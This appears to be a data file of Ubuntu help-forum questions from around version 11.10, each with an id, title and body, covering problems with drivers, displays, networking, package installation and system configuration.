85939	how can i unmount a truecrypt partition which has open files on it ?	i have a truecrypt volume , and i have some restricted data on it . i had mounted today and i started a matlab simulation . the simulation is takes around 2-3 days , and i would like to unmount the truecrypt , but i ca n't because i the matlab had opened the files and i forgot to include the close function to close those files . i do n't want to stop the simulation but i would like to unmount the truecrypt . i used lsof to figure it out who is using this volume . command pid user fd type device size/off node name matlab 6013 bku 276r reg 252,0 333 158 /media/vulturus_data/wesys/transfer/repower_temp/r4_scada_mai_11/sensors/sensorinfos_repower_1.00000000.csv matlab 6013 bku 278r reg 252,0 333 158 /media/vulturus_data/wesys/transfer/repower_temp/r4_scada_mai_11/sensors/sensorinfos_repower_1.00000000.csv matlab 6013 bku 279r reg 252,0 581 159 /media/vulturus_data/wesys/transfer/repower_temp/r4_scada_mai_11/sensors/sensorinfos_repower_50.00000000.csv matlab 6013 bku 281r reg 252,0 61890 79 /media/vulturus_data/wesys/transfer/repower_temp/r4_scada_mai_11/aggregated/aggregateddata_repower_50.00000000_17.05.2011_06-30.csv how can i close this files without stopping the matlab simulation .
85941	how do i modify /etc/syslog.conf to send messages to specific files ?	how do i modify /etc/syslog.conf so that i would send all messages with `` warn '' priority , except those of type `` mail '' and `` lpr '' to /var/log/mywarnings . i also have to send all messages of type `` mail '' , except those with priority `` err '' to /var/log/mymail .
85942	what are the differences between concurrency=shell and concurrency=makefile ?	i feel that 11.10 boots very slow on my netbook . many people said that changing concurrency method to shell in /etc/init.d/rc will speed up boot process , but the comment in the file said that the valid options of concurrency are 'none ' and 'makefile ' , and the concurrency method since 2010-05-14 was makefile . what are the differences between both ? is shell concurrency method still used until now ?
85943	how can i fix intermittent isight camera functionality on a macbook pro 5,2 ?	i have a macbook pro 5,2 laptop dual booting osx and ubuntu . the built-in isight video camera works only sporadically . by that i mean that sometimes if i boot and try to use the camera it does not work ( most of the time ) but other times it does . i do n't have good repeatable data regarding when it does vs. when it does n't other than to say that it always seems to work right after i upgrade to a new linux kernel with the update manager and reboot , but then eventually stops working again until i upgrade the kernel again . that is hard to test repeatably , so it 's hard to know for sure that that is the case . this has happened consistently with every version of ubuntu from 10.10 through 11.10 . i can get around this by booting into the os/x partition , since all of the hardware obviously works perfectly on that side of things , but it would be great if i could remain in ubuntu and do the same thing . thanks in advance for any insights .
85945	how do i form a dictionary with words from given files ?	how do i extract all words from all files in a given directory in order to make a dictionary ? the words must be different from each other ( letters in caps are not taken into consideration . for example , car=car ) , they will be written with small letters in the dictionary ( even if in originally they had caps ) , they will be sorted alphabetically and each line in the dictionary will contain only one word . the dictionary will be in /home/dictionary.txt .
85946	tried installing bumblebee and now unity is corrupted ?	i 've installed bumblebee at my laptop due to the 520m gpu following the steps mentioned here . what i see after logging out and in is this . but i 've noticed now that i do have some effects i did n't have , in example the windows open with a bounce effect ( if we can call it that way ) and the alt+tab feature shows now the screenshots of the windows . what can i do ? here 's the link to pastebin with contents of xorg.0.log .
85947	quickly-ubuntu template showing unmet dependencies and broken packages	i tried to install quickly-ubuntu-template using : sudo apt-get install quickly-ubuntu-template this is what it returned : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : quickly-ubuntu-template : depends : python-pygame but it is not going to be installed e : broken packages help please ?
85951	how do i create a file with a given structure ?	how do i create a file that has x bytes of 0 , y bytes of the number 7 ( i.e . 0x07 in hex , 00000111 in binary ) , z random bytes and t bytes of the number 25 ( 0x19 in hex , 00011001 in binary ) . finally , this file should be of size x+y+z+t bytes .
85953	can i retrieve files from trash after it has been emptied ?	is it possible to find files that have been deleted and the trash is empty ? my desktop was cleaned out and i am not sure why , but it had some files i would like to recover .
85970	qt creator wo n't recognize any qt version	i 've just installed qt creator from the ubuntu software center . when i try to open any project other than a qt quick project i get following error message : no valid qt versions found . please add a qt version in tools/options or via the maintenance tool of the sdk . in tools → options → qt4 , qmake-qt4 was added to the list automatically . this is what my qt4 options menu looks like . here is the output of dpkg -- get-selection | grep qt . what am i missing to get qt creator to let me open qt c++ projects ?
85972	how can i set up different startup profiles ?	i 'm fairly sure this is a basic question , nevertheless i 'm having some problems with solving this . i 'm trying to set up different startup profiles set specifically to different activities ... like when i want to do web development and such , it would start the apache server and other stuff , but when i 'm not these services would be disabled - once i get the logic of it , i can tailor it , hope you get the picture as to what i 'd like to do . my first thought was that it would be selected in grub , but if anyone has a different suggestion , do n't hold it in . : ) thanks , din
85973	random disconnects with an atheros ar5008	for the most part my wireless network works perfectly fine . but about once a day , at random times i get disconnected and the key ring authentication for my wireless pops up . all of the correct information is entered in key ring but when i hit connect , it is unsuccessful at reconnecting to network and the authentication window pops up again . the network is in working order and this is the only computer effected . this is fixed by restarting my computer , but it is a production machine so having to stop what i 'm working on and restart gets quite frustrating . here is the screen that pops up : the wireless card is a d-link xtreme n dwa-552 here is the output of the log when the issue happens : dec 8 17:51:16 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : supplicant connection state : disconnected - > scanning dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : device state change : 8 - > 3 ( reason 11 ) dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : deactivating device ( reason : 11 ) . dec 8 17:51:31 gandhi avahi-daemon [ 954 ] : withdrawing address record for 192.168.1.125 on wlan0 . dec 8 17:51:31 gandhi avahi-daemon [ 954 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.1.125 . dec 8 17:51:31 gandhi avahi-daemon [ 954 ] : interface wlan0.ipv4 no longer relevant for mdns . dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) starting connection 'auto james' dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : device state change : 3 - > 4 ( reason 0 ) dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : supplicant connection state : scanning - > disconnected dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 2 of 5 > ( device configure ) starting ... dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : device state change : 4 - > 5 ( reason 0 ) dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0/wireless ) : access point 'auto james ' has security , but secrets are required . dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : device state change : 5 - > 6 ( reason 0 ) dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : device state change : 6 - > 4 ( reason 0 ) dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > ( wlan0 ) : device state change : 4 - > 5 ( reason 0 ) dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > activation ( wlan0/wireless ) : connection 'auto james ' has security , and secrets exist . no new secrets needed . dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > config : added 'ssid ' value 'james' dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > config : added 'scan_ssid ' value '1' dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' dec 8 17:51:31 gandhi networkmanager [ 951 ] : < info > config : added 'psk ' value ' < omitted > ' dec 8 17:51:31 gandhi networkmanager [ 951 ] : nm_setting_802_1x_get_pkcs11_engine_path : assertion `nm_is_setting_802_1x ( setting ) ' failed dec 8 17:51:31 gandhi networkmanager [ 951 ] : nm_setting_802_1x_get_pkcs11_module_path : assertion `nm_is_setting_802_1x ( setting ) ' failed here is the the output of lspci -nn , pertaining to my wireless adapter : 03:07.0 network controller [ 0280 ] : atheros communications inc. ar5008 wireless network adapter [ 168c:0023 ] ( rev 01 ) and here is the output of sudo lshw -class network : *-network description : wireless interface product : ar5008 wireless network adapter vendor : atheros communications inc. physical id : 7 bus info : pci @ 0000:03:07.0 logical name : wlan0 version : 01 serial : 00:1e:58:3b:18:19 width : 32 bits clock : 66mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=2.6.38-13-generic firmware=n/a ip=192.168.1.125 latency=168 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:21 memory : fdee0000-fdeeffff rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no please help ! update : vlc seems to make this problem more frequent . it was occurring only once a day under normal conditions , but when i was running vlc yesterday it crashed several times in a much shorter period . not sure if this is related , but it is pretty strange ...
85975	how do i share a folder on a ntfs partition over the network ?	i 'm on ubuntu 11.10 , and i want to share a folder on an automounted ntfs partition ( /dev/sda4 ) over the network . the purpose of this network is to share files between computers , it contains mostly windows computers . i use this /dev/sda4 partition both from windows 7 and ubuntu . using nautilus , i right-click the directory , then i click 'sharing options ' , then i mark the three checkboxes . when i try to apply the settings though , it says 'could n't change the rights of the folder `` foldername '' ' . i 've put the output of sudo blkid and cat /etc/fstab below . sudo blkid /dev/sda2 : label= '' windows '' uuid= '' 481319c261268d8d '' type= '' ntfs '' /dev/sda3 : uuid= '' 23dac5e8-aae7-43ac-964c-c8a5a033b0d7 '' type= '' ext4 '' /dev/sda4 : label= '' data '' uuid= '' 00f1b269675b86ae '' type= '' ntfs '' /dev/sda5 : uuid= '' 6de8b757-f17e-4e36-935c-a3fd6012c628 '' type= '' ext4 '' /dev/sda6 : uuid= '' d504bae2-fad6-4f6a-b489-7719ad0fe3b3 '' type= '' swap '' cat /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda3 during installation uuid=23dac5e8-aae7-43ac-964c-c8a5a033b0d7 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation uuid=d504bae2-fad6-4f6a-b489-7719ad0fe3b3 none swap sw 0 0 /dev/sda4 /media/data ntfs defaults , umask=007 , gid=46 0 0 how can i share this folder ?
85976	keyboard does n't work properly after waking up from suspend	i have ubuntu installed on my laptop and i use it with a keyboard and mouse usb . it all works fine , until it wakes up from suspend . then the keyboard sometimes does n't send the key i press . i have to press it sometimes until i get it on the screen . if i remove the usb and put it back , it works properly again . this just happens to the keyboard - the mouse keeps working fine . anybody knows why this happens ? edit : my ubuntu version is 11.10 . keyboard wise wskb - 0003 . laptop positivo sim+ . obs : when waking up in windows 7 i do n't have this problem .
85977	how do i create a file and mount it as a filesystem ?	how do i create a file of size 10m , format it with ext3 filesystem and then mount it in /media/fuse ? i tried with mkfs -t ext3 file then to mount it mount -t ext3 file /media/fuse it did n't work because it said that file was n't a block device . can anybody help me ?
85978	building a 32-bit app in 64-bit ubuntu	after hours of googling , i decide to give up and ask you experts . i am trying to build a 32-bit application ( xgap if anyone interested ) in my 64 ubuntu 11.10 . i added the cflags=-m32 and the ldflags=-l/usr/lib32 in the makefile . the objects are built into 32 bit fine . the last step is to link all the objects and libraries for x windows into this executable -- -xgap . somehow it keeps giving me this error : gcc -o xgap xcmds.o utils.o gapgraph.o gaptext.o pty.o popdial.o xgap.o selfile.o -l/usr/lib32 -lxaw -lxmu -lxt -lxext -lx11 -lsm -lice /usr/bin/ld : skipping incompatible /usr/lib32/libxmu.so when searching for -lxmu ... /usr/bin/ld : i386 architecture of input file `xcmds.o ' is incompatible with i386 : x86-64 output ... i have installed ia32-libs and mutilib support . i think i just need to force the linker to generate a i386 output . i tried to put two ld flags in my gcc command as shown above : -melf_i386 and -oformat elf32-i386 . but what happens is that gcc does n't search for the 32 bit library in /usr/lib32 anymore . i wonder if i need to put those flags in some fixed order ? thanks for any idea and help ! edit : when i add the -m32 flag in my last gcc command ( the linking stage i believe ) , even if i have the -l/usr/lib32 flag in place , gcc does n't search in /usr/lib32 anymore ( really weird ... ) and generates the following error : /usr/bin/ld : skipping incompatible /usr/lib/gcc/x86_64-linux-gnu/4.6.1/../../../libxaw.so when searching for -lxaw /usr/bin/ld : skipping incompatible /usr/lib/libxaw.so when searching for -lxaw /usr/bin/ld : can not find -lxaw collect2 : ld returned 1 exit status any one has any idea why this happens ? i am using the auto tool to configure and make . i am really good at modifying those script files . eidt : i solved the problem . i think that gcc was expecting a static library archive . i used the getlibs script from http : //ubuntuforums.org/showthread.php ? t=474790 to download all the .a archives needed for linking . then gcc worked . i think gcc did search in /usr/lib32 directory but did n't find the .a archives so went on to search in the standard directory which is /usr/lib , where it finds the incompatible *.so files . but then the question is : the *.so files in /usr/lib32/ from package ia32-libs does n't really have the libraries needed for linking ? what are those files in /usr/lib32/ used for ?
85981	installation fails on alienware aurora r3	attempting to put ubuntu 11.10 on my new pc ( alienware aurora r3 ) and installation fails despite how i attempt to install . have tried three ways : installing from win7 with wubi installing from cd booting into `` demo '' version installing from wubi leads to it getting stuck at a purple screen ( with two small icons at bottom ) , after rebooting it stops at the same point as attempts to do a `` real '' install . i 've tried leaving it here for hours and it 's definitely stuck/stopped at this point . which seem to be modprobe related as seen by the last two lines here :
85982	how to make adwaita dark theme apply only to certain applications ?	is this possible to apply adwaita dark theme only to some applications ? i want to enable it for the terminal and maybe nautilus but not other applications , because opera and software center and possibly other non gtk applications look ugly/unreadable with adwaita dark theme .
85985	how can i make a script run automatically after gdm login and logout ?	i have a setup where my users log on using ldap and it works just fine . i want to run a script after my users login ( its a script that will detect which groups they are in and map network shares accordingly ) , and after they logout ( umounting their shares ) . both scripts are done and they work . i want that when the user logs in the box a script runs downloading the mounting script from my server ( wget i guess ? ) and runs it , same thing for logout . can it be done ? i 've been searching the net and had no luck so far . i 've managed to make that work on shell login/logout , but my users dont even know what shell is and have no use for it : )
85987	can i have an icon on my desktop housing multiple folders ?	i 'm trying to clean up my desktop . so far i have a few folders for class notes , mounted files ( iso ) a shared folder for the network , etc . i 'd like to be able to have an icon on my desktop that i could rollover , and have a display show up listing the folders located in it . something to just organize my desktop icons into categories . is there a way ?
85990	postgresql 8.4 to 9 manual upgrade ( 11.04 to 11.10 )	after updating 11.04 to 11.10 using 'do-release-upgrade ' , installer did not updated postgresql 8.4 to 9 version , saying that i have to do it manually . but how ? i heard many problems , for example data loss , or dissapered config files after updating manually from 8.4 to 9 in ubuntu . sow how to update , to avoid data damage or other problems ? thanks .
86006	where is the default bash profile file kept ?	under ubuntu 11.10 , where is the default bash profile file for new users kept ? i want to edit the default file so that new users get a preconfigured .bash_profile file .
86014	bootwindow problem at startup	using windows and ubuntu , i got a black screen with white letters and just three options : `` start windows '' , `` start ubuntu '' or `` windows recovery '' . now i installed ubuntu on an extra drive and get a purple window with a whole bunch of options that i dont need , want or do n't even know what the do , does someone knows how to help me or how to get the old bootloader back , without uninstalling ubuntu .
86015	viewing pdf comments	in ubuntu 10.04 evince does not display comments in an annotated pdf file . or at least that is what my experience is when i was trying to view them . i searched for information about it and i found some people who complained about this feature missing . i am wondering if anyone has suggestions for a good pdf viewer that run in gnome and displays comments in an annotated pdf file . i do n't care about being to annotate the file myself right now , i just want to be able to view comments made by someone else .
86016	should i as a developer use var/www in conjuction with apache ?	i come from a strong windows background . therefore with iis i have some site on my d drive , i then point iis at this location and start serving files . with apache though it seems var/www is the default location . this would match iis in the sense that iis uses wwwroot or similar . for local development i am used to using something within my user directory , but is this the standard practice for development on linux ? should i copy my code to var/www whenever i make a change ? should i use folders within my home directory ? or should i use another location all together ? does anyone know of an iis to apache tutorial ? i should add that when i change var/www to home/shaun/sites i can not serve any files , hence i think i should not be doing this , or at least use another directory .
86019	what is the difference between eject and safely remove device	taking this question and it 's answer into account what is the difference between `` unmount '' , `` eject '' , `` safely remove drive '' and the eject icon ? i ask : why do both options appear if they are the same . is there some kind of difference in regards to how they unmount the unit ( just in case they changed their functionality in the latest ubuntu versions ) and if they are the same , would it be possible to remove one of them .
86024	how to install hercules webcam deluxe	i am trying to install a hercules webcam deluxe on my ubuntu 11.10 ( 64 bits ) . i followed this guide : https : //help.ubuntu.com/community/ov51x step by step , only changing wget http : //www.rastageeks.org/downloads/ov51x-jpeg/ov51x-jpeg-1.5.4.tar.gz by 1.5.9 , because that is the latest version . i get stacked here : 2.4 . prepare the installation files make 2.5 . compile compile the modules : sudo make install because , when i enter that in a terminal , i get this error : make : *** no hay objetivos . alto . for you , non spanish-speaking-people , that is roughly translated as : `` there are no objectives . stop '' so ... what can i do ? thanks edit : terminal output : configurando build-essential ( 11.5ubuntu1 ) ... mrpotato @ mrsobremesa : ~ $ wget http : //www.rastageeks.org/downloads/ov51x-jpeg/ov51x-jpeg-1.5.9.tar.gz -- 2011-12-08 03:33:47 -- http : //www.rastageeks.org/downloads/ov51x-jpeg/ov51x-jpeg-1.5.9.tar.gz resolviendo www.rastageeks.org ... 213.251.174.188 conectando a www.rastageeks.org|213.251.174.188|:80 ... conectado . petición http enviada , esperando respuesta ... 200 ok longitud : 88197 ( 86k ) [ application/x-gzip ] guardando en : «ov51x-jpeg-1.5.9.tar.gz.1» 100 % [ ====================================== > ] 88.197 245k/s en 0,4s 2011-12-08 03:33:47 ( 245 kb/s ) - «ov51x-jpeg-1.5.9.tar.gz.1» guardado [ 88197/88197 ] mrpotato @ mrsobremesa : ~ $ tar -xvf ov51x-jpeg-1.5.9.tar.gz ov51x-jpeg-1.5.9/ ov51x-jpeg-1.5.9/test/ ov51x-jpeg-1.5.9/test/makefile ov51x-jpeg-1.5.9/test/getjpeg.c ov51x-jpeg-1.5.9/makefile ov51x-jpeg-1.5.9/ov51x-jpeg-core.c ov51x-jpeg-1.5.9/ov518-decomp.c ov51x-jpeg-1.5.9/ov51x-jpeg.h ov51x-jpeg-1.5.9/ov519-decomp.c ov51x-jpeg-1.5.9/ov511-decomp.c ov51x-jpeg-1.5.9/ov7670.h ov51x-jpeg-1.5.9/changelog mrpotato @ mrsobremesa : ~ $ cd ov51x-jpeg-1.5.9 mrpotato @ mrsobremesa : ~/ov51x-jpeg-1.5.9 $ make make : *** no hay objetivos . alto . mrpotato @ mrsobremesa : ~/ov51x-jpeg-1.5.9 $ sudo make make : *** no hay objetivos . alto . mrpotato @ mrsobremesa : ~/ov51x-jpeg-1.5.9 $
86026	touchpad does n't work after upgrade to 11.10	the touchpad on my asus notebook used to work fine in 10.10 . after upgrading to 11.04 and then to 11.10 , it is gone . i 've already tried the two solutions described at : touchpad not working on dell xps l501x unchecking `` disable touchpad when typing '' : does n't work ( even if it did it would not be a solution : what if i do want it to be disabled when typing ? ) but anyway it does n't work at all the file /etc/acpi/asus-touchpad.sh and changing the name of the brand . any ideas ?
86031	how to set up a multiseat system ?	i intent to buy a new desktop pc , but i 'm wondering if i can share one machine between 2 users . i read about the subject , however i did n't find any guide for that , only some isolated answers/comentaries . then i tried to test it with my laptop that has only one video board , but after some tries that failed and killed my graphicall interface and at each try i had to reinstall my system , i gave up . i know that lightdm does support multiseat , but it 's only unlockable through editing lighdm.conf , there are not any graphicalleasytouseandfullofbuttons programs ... and any instructions . so the questions are : can i have a multiseat system using ubuntu 11.10/12.04 with two video boards ? and if so , how ? can i have a multiseat using one video board ? if so , how ? thank you for the attention , rodrigo martins . [ edit ] i 've been trying to get something from these sources : support multi-seat configuration file for setup1 lightdm.conf virtual terminal switching with multiseat setup and lightdm multiseat sample xorg.conf ati intel i figured out more or less how to setup lightdm.conf for multiseat , but the problem now stands at xorg.conf , looking at the fourth and fifth links i had some idea of how to do the configuration , but i do n't know how to call my second screen , that is connected to the vga output , in the section when it asks for the 'identifier ' , 'screen ' and 'monitor ' , is it just to put screen1 and monitor1 ? vga and vga-monitor ? can you help me with this ?
86034	question on gnome shell theme editing	i know nothing about css , but with a little help , i managed to make the activites button in shell to display the ubuntu icon . it 's great , works good with most all themes . except for one part . there is a small gap between the ubuntu icon and the icon for the current application ( left of the mouse in the second picture ) . i know that it would n't bother anyone besides me , but when it comes to my desktop i have ocd and need to find a way to get that gap smaller . is there any way to get the small little area even smaller ? any number i can edit in the css file ? i use the icon on zukiwito-shell and faience shell themes , but i believe my problem would be the same with just stock default theme . the line i add is the one highlighted in this pic ( i manually add image.png in the folder of the theme ) any ideas ?
86036	how do i change window theme in 11.10 ?	i do n't know how i did it , but now i 'm stuck with this same window theme ! whichever theme i change to , the window theme will stick and only the background colour of the window title will change . here i changed from ambience blue theme to zukini theme but only the background colour of the windows title change from blue to greenish , the rest is still the same . edit : sorry i was n't clear enough , i 'm using unity not gnome3 . update : i tried to change with gconf-editor but it has failed to change the windows theme . 1.window theme selected in gconf-editor 2.window theme shown in gnome-tweak-tool
86040	authentication for everything	i was wondering if it is possible to just disable the password authentication . it is getting tedious to install everything when i 'm being asked to enter my password what feels like every two seconds .
86041	strange correlation between issues with audio and wlan .	sometimes , for no apparent reason , my audio suddenly goes crazy and a few seconds later , the wireless network stops working . it 'll ask me to enter the password for my wireless network , but it wo n't connect , and after a while -- a minute maybe , i can no longer see any wireless networks . what happens to my audio is that it starts to skip , as if i 'm playing a cd with scratches or something , which i 'm obviously not . the system is not under a heavy load when this happens , and there is no spike of any kind . the last time it happened , it was running calmly at 0.20 . this happens with all kinds of audio , so there 's not just an issue with a single program . the exact same thing happens every time , and i know that when the audio goes bananas , i 'll have to reboot . i purchased a new wireless network pci-e card , a dlink dwa-556 , i think it 's called . i 've never had this problem in ubuntu before , but i also purchased that card before 11.10 was released , so i ca n't say for certain that the card is to blame . i also do n't know why a faulty wlan driver would cause problems with audio . i 've searched everywhere , but i ca n't find any similar complaints . since i do n't know what causes this , i do n't know what to look for either , or what to file bugs against . if anyone has heard of similar issues , i would appreciate links . any suggestions for things i can check when the problem occurs ? leave a comment so i can try , and i 'll appreciate it . am i forgetting something ? let me know ! : ) thanks .
86044	ca n't ssh or console to the guest using ubuntu-vm-builder	i 'm running oneric as the host , would like to create several virtual machines . both the host and the guests will be headless - there is no display connected , and i 'd like to connect to them via ssh . looks like kvm is the official ubuntu recommended way , so i 'm following the documentation : http : //help.ubuntu.com/community/kvm/createguests here 's my ubuntu-vm-builder command : sudo ubuntu-vm-builder kvm oneiric \ -- domain xpstage -- dest xpstage -- hostname xpstage \ -- arch i386 -- mem 1024 \ -- user myusername -- pass mypassword \ -- bridge virbr0 -- ip 192.168.122.2 -- dns 8.8.8.8 \ -- components main , universe , restricted \ -- addpkg acpid -- addpkg vim -- addpkg openssh-server -- addpkg avahi-daemon \ -- libvirt qemu : ///system ; the guest appears to build just fine , but i ca n't reach it . ssh myusername @ 192.168.122.2 times out . my bridge network is setup : virbr0 link encap : ethernet hwaddr 00:00:00:00:00:00 inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:673 errors:0 dropped:0 overruns:0 frame:0 tx packets:21 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:60839 ( 60.8 kb ) tx bytes:882 ( 882.0 b ) so i 'm not sure what i 'm doing wrong there . having failed with ssh i tried to console into it , but virsh console xpstage returns immediately , so i added a pty section to the configuration : virsh edit xpstage after adding the pty virsh console xpstage connects , but does n't display anything and key presses do n't do anything . i then tried setting up a serial console , but upstart does n't like that : start : unknown job : ttys0 . can some kind soul please guide me to how to setup a headless kvm guest on oneric that i can connect to ?
86045	apache2 stops working after running a2ensite command	i had my lamp server crushed for some reason . that 's why i 've completely removed it and installed once again . installation was successful and `` localhost '' is working fine . however every time i 'm trying to add a virtual host ( using a2ensite command ) my apache2 server stop working . when i run a2dissite command of a corresponding virtual host , the server start working again . please , help me to solve this issue .
86048	could not apply stored configuration for monitor	i am receiving the following message : could not apply stored configuration for monitor '' required virtual size does not fit available size : requested ( 408 , 1440 ) , minimum ( 320 , 200 ) , maximum ( 2560 , 2560 ) '' my setup is as follow : driver : vesa : rv710 experience : standard video card : ati technologies inc rv710 [ radeon hd 430 ] ubuntu : 11.10 gnome 3.2.1 i am using catalyst control centre to configure my monitors . how can i fix this error ?
86052	how to install zarafa on ubuntu 11.10 ?	does anybody know a got tutorial explaining how to install zarafa on ubuntu 11.10 ? or does anybody know a good alternative ? i would really like to have a easy administrable system providing all my thousands of mail on a local machine , making me able to access them both with standard email client like thunderbird and via a good web interface . thank you for any advice !
86054	configuration and compilation settings used for ubuntu packages	i want to be able to recreate specific packages by compiling the source code of the package . to compile the source code one has to run the configuration process , followed by the compilation process . i know how to do it , just not what specifics ubuntu is supplying . packages could be empathy , banshee or specific libraries for that matter . i can compile them just fine using the ( general ) information provided at each project site . in a lot of cases i do , however , end up with a build which is just not quite the same as the original one . slightly different menu options , some functionality functioning differently or not at all , etc . is there any source where the configuration and compilation options can be found which are used for the packages included in ubuntu ? possible also ubuntu or debian specific patches .
86055	rotating screen 90 degrees clockwise	just got a new computer loaded with nvidia gforce n430 , and installed a fresh new ubuntu 11.10 amd64 . i also enabled nvidia drivers using `` additional drivers '' apt , and all is working fine in `` normal '' mode , however , i want to rotate my screens , and failed getting through . iirc , in previous installations , there used to be an entry for rotation within nvidia-settings ui , but not in this version . i am using two screens , and willing to use them rotated 90 degrees clockwise ( portrait vs. landscape ) . i am dumping my x11/xorg.cong file and will appreciate if one can tell where to add the option `` randrrotation '' `` true '' line . by the way , $ xrandr -o right prints out x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 2 ( rrsetscreenconfig ) serial number of failed request : 14 current serial number in output stream : 14 content of /etc/x11/xorg.conf $ cat /etc/x11/xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 280.13 ( buildd @ allspice ) thu aug 11 20:54:45 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` philips 225p '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` philips 225p '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 430 '' busid `` pci:4:0:0 '' screen 1 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 430 '' endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` metamodes '' `` dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' # removed option `` twinview '' `` 0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +1680+0 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
86057	ssh hangs about a minute after login	i am connecting from a ubuntu desktop 11.10 to a ubuntu server 11.10 , over ssh using public key authentication . problem is within about a minute after logging in , the connection hangs . i 've seen it happen once while in vi and a few times while just at the prompt . connecting from windows 7 using putty seems to work fine , so i 'm thinking it 's a problem with my ssh client on my ubuntu desktop or the an issue with the public key pair . any advice on how i can troubleshoot ? thanks in advance .
86058	odd theme problem in 11.10	no matter what i do i ca n't seem to change icon as well as gtk theme . my question is not a duplicate of desktop forgets theme ? because the solution doesnot work . i have tried : gnome-tweak-tool dconf-editor but both donot work .
